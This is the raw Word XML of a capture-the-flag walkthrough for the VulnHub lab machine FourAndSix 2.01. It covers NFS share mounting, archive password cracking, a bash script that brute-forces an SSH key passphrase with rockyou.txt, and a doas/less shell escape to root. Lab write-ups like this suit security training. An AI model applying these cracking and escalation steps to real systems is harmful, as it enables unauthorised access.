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1ACD" w:rsidRDefault="000655DA">
      <w:r>
        <w:t xml:space="preserve">VM: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:anchor="download" w:history="1">
        <w:r w:rsidR="00AF1A08" w:rsidRPr="00A47AAB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/fourandsix-201,266/#download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AF1A08" w:rsidRDefault="0033550D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB3BD07" wp14:editId="7A76FF79">
            <wp:extent cx="5943600" cy="1645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DB" w:rsidRDefault="00121EDB" w:rsidP="00121EDB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33550D" w:rsidRDefault="00121EDB" w:rsidP="00121EDB">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.171</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00121EDB" w:rsidRDefault="00B73768" w:rsidP="00121EDB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E50E6FF" wp14:editId="010E3945">
            <wp:extent cx="5372100" cy="3438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67" w:rsidRDefault="00F41A67" w:rsidP="00F41A67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B73768" w:rsidRDefault="00F41A67" w:rsidP="00F41A67">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -e 192.168.21.171</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41A67" w:rsidRDefault="005C3A5B" w:rsidP="00F41A67">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C21C35" wp14:editId="7E272FAA">
            <wp:extent cx="3209925" cy="771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D9" w:rsidRDefault="005E09D9" w:rsidP="005E09D9"/>
    <w:p w:rsidR="005E09D9" w:rsidRDefault="005E09D9" w:rsidP="005E09D9"/>
    <w:p w:rsidR="005E09D9" w:rsidRDefault="005E09D9" w:rsidP="005E09D9">
      <w:r>
        <w:lastRenderedPageBreak/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5E09D9" w:rsidRDefault="005E09D9" w:rsidP="005E09D9">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hack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5E09D9" w:rsidRDefault="005E09D9" w:rsidP="005E09D9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5C3A5B" w:rsidRDefault="005E09D9" w:rsidP="005E09D9">
      <w:r>
        <w:t xml:space="preserve">└─# mount -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.21.171:/home/user/storage hack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E09D9" w:rsidRDefault="008B56FF" w:rsidP="005E09D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="231FD49D" wp14:editId="5077873C">
            <wp:extent cx="4448175" cy="914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FFE" w:rsidRDefault="00161FFE" w:rsidP="00161FFE">
      <w:r>
        <w:t>But the file “backup.7z” was unfortunately password protected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B56FF" w:rsidRDefault="00161FFE" w:rsidP="00161FFE">
      <w:r>
        <w:t xml:space="preserve">So, after trying out a number of options like John </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Ripper and etc. and getting zero success, we found a site online to break it’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161FFE" w:rsidRDefault="004256AD" w:rsidP="00161FFE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61CCFD1B" wp14:editId="3A083E1B">
            <wp:extent cx="4171950" cy="1190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6AD" w:rsidRDefault="006E6A54" w:rsidP="00161FFE">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="008E6C10" w:rsidRPr="00A47AAB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.lostmypass.com/jobs/ZzlKbklZakMrNFY1RnREbHdWMyt6UT09/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008E6C10" w:rsidRDefault="008E6C10" w:rsidP="00161FFE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392BFCFA" wp14:editId="604E68B0">
            <wp:extent cx="5943600" cy="2898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10" w:rsidRDefault="001421B7" w:rsidP="00161FFE">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="001421B7">
        <w:t>chocolate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E505D" w:rsidRDefault="009E505D" w:rsidP="009E505D"/>
    <w:p w:rsidR="009E505D" w:rsidRDefault="009E505D" w:rsidP="009E505D">
      <w:r>
        <w:lastRenderedPageBreak/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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001421B7" w:rsidRDefault="009E505D" w:rsidP="009E505D">
      <w:r>
        <w:t>└─# 7z e backup.7z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E505D" w:rsidRDefault="009E505D" w:rsidP="009E505D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49A1314E" wp14:editId="7C353CE3">
            <wp:extent cx="5943600" cy="2268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A1" w:rsidRDefault="006150A1" w:rsidP="006150A1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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E505D" w:rsidRDefault="006150A1" w:rsidP="006150A1">
      <w:r>
        <w:t>└─# cat id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150A1" w:rsidRDefault="006150A1" w:rsidP="006150A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071EADC7" wp14:editId="75C151A3">
            <wp:extent cx="5943600" cy="349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9C" w:rsidRDefault="0046349C" w:rsidP="0046349C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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150A1" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t>└─# cat brute.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C"/>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t>FILE=$1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t>PASSWORD=$2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t>COMMENT=user@fourandsix2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C"/>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>die(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aux \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">               | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">               | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'parallel' \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">               | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>awk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{ print</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $2 }'); do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -9 $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C"/>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh-keygen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c -C "$COMMENT" -P "$PASSWORD" -f "$FILE" &amp;&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "Password is '$PASSWORD'" | tee found.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>die</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="0046349C" w:rsidP="0046349C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FB059D" wp14:editId="106073FD">
            <wp:extent cx="5934075" cy="3257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17" w:rsidRDefault="00AF0D17" w:rsidP="00AF0D17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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0D17" w:rsidRDefault="00AF0D17" w:rsidP="00AF0D17">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x brute.sh                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0D17" w:rsidRDefault="00AF0D17" w:rsidP="00AF0D17">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0D17" w:rsidRDefault="00AF0D17" w:rsidP="00AF0D17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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046349C" w:rsidRDefault="00AF0D17" w:rsidP="00AF0D17">
      <w:r>
        <w:t xml:space="preserve">└─# time parallel -j4 ./brute.sh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "{}" &lt; /home/kali/Downloads/rockyou.txt   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096C38" w:rsidRDefault="00096C38" w:rsidP="00096C38">
      <w:r>
        <w:t>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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0D17" w:rsidRDefault="00096C38" w:rsidP="00096C38">
      <w:r>
        <w:t>└─# cat found.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096C38" w:rsidRDefault="00096C38" w:rsidP="00096C38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510FFC75" wp14:editId="2BF0FBE0">
            <wp:extent cx="5943600" cy="20624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9BD" w:rsidRDefault="001F39BD" w:rsidP="001F39BD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kali)-[/home/kali/Downloads/hack]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096C38" w:rsidRDefault="001F39BD" w:rsidP="001F39BD">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00A47AAB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>user@192.168.21.171</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F39BD" w:rsidRDefault="00E4382F" w:rsidP="001F39BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11329B7D" wp14:editId="65F0CC95">
            <wp:extent cx="5943600" cy="2790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2F" w:rsidRDefault="009D27A0" w:rsidP="001F39BD">
      <w:r w:rsidRPr="009D27A0">
        <w:t>fourandsix2$ find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D27A0" w:rsidRDefault="009D27A0" w:rsidP="001F39BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A7A731E" wp14:editId="70E7F353">
            <wp:extent cx="4048125" cy="2924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54" w:rsidRDefault="006E6A54" w:rsidP="001F39BD"/>
    <w:p w:rsidR="006E6A54" w:rsidRDefault="006E6A54" w:rsidP="001F39BD">
      <w:r>
        <w:t xml:space="preserve">We get this </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6A54">
        <w:t>/usr/bin/doas</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00245DAC" w:rsidRDefault="00346A1E" w:rsidP="001F39BD">
      <w:r w:rsidRPr="00346A1E">
        <w:t>fourandsix2$ cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00346A1E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00346A1E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00346A1E">
        <w:t>doas.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00346A1E" w:rsidRDefault="00ED6E12" w:rsidP="001F39BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62DEB513" wp14:editId="1F49D148">
            <wp:extent cx="5819775" cy="762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12" w:rsidRDefault="002A504C" w:rsidP="001F39BD">
      <w:r w:rsidRPr="002A504C">
        <w:t xml:space="preserve">fourandsix2$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A504C">
        <w:t>doas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A504C">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A504C">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A504C">
        <w:t>/bin/less /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A504C">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A504C">
        <w:t>/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A504C">
        <w:t>authlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002A504C" w:rsidRDefault="00F46B13" w:rsidP="001F39BD">
      <w:r w:rsidRPr="00F46B13">
        <w:t>Ent</w:t>
      </w:r>
      <w:r w:rsidR="00837D41">
        <w:t>er v to escape to vi and then “:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003E5553">
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F46B13">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F46B13">
        <w:t>” to escape to our brand new shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46B13" w:rsidRDefault="00F46B13" w:rsidP="001F39BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44301C1B" wp14:editId="24D882F4">
            <wp:extent cx="5943600" cy="1339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13" w:rsidRDefault="00F46B13" w:rsidP="001F39BD"/>
    <w:sectPr w:rsidR="00F46B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E6E"/>
    <w:rsid w:val="000655DA"/>
    <w:rsid w:val="000937E6"/>
    <w:rsid w:val="00096C38"/>
    <w:rsid w:val="00121EDB"/>
    <w:rsid w:val="001421B7"/>
    <w:rsid w:val="00161FFE"/>
    <w:rsid w:val="001F39BD"/>
    <w:rsid w:val="00245DAC"/>
    <w:rsid w:val="002A504C"/>
    <w:rsid w:val="0033550D"/>
    <w:rsid w:val="00346A1E"/>
    <w:rsid w:val="003E5553"/>
    <w:rsid w:val="004256AD"/>
    <w:rsid w:val="0046349C"/>
    <w:rsid w:val="00581ACD"/>
    <w:rsid w:val="005C3A5B"/>
    <w:rsid w:val="005E09D9"/>
    <w:rsid w:val="006150A1"/>
    <w:rsid w:val="006E6A54"/>
    <w:rsid w:val="00837D41"/>
    <w:rsid w:val="008B56FF"/>
    <w:rsid w:val="008E6C10"/>
    <w:rsid w:val="009D27A0"/>
    <w:rsid w:val="009E505D"/>
    <w:rsid w:val="00AF0D17"/>
    <w:rsid w:val="00AF1A08"/>
    <w:rsid w:val="00AF2E6E"/>
    <w:rsid w:val="00B73768"/>
    <w:rsid w:val="00E4382F"/>
    <w:rsid w:val="00ED6E12"/>
    <w:rsid w:val="00F41A67"/>
    <w:rsid w:val="00F46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52003"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3EC8B9F7-B26D-4A15-AD95-BF3E3C8CD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F1A0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mailto:user@192.168.21.171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www.lostmypass.com/jobs/ZzlKbklZakMrNFY1RnREbHdWMyt6UT09/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/fourandsix-201,266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6</Pages>
  <Words>409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 dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-16T14:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-17T08:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>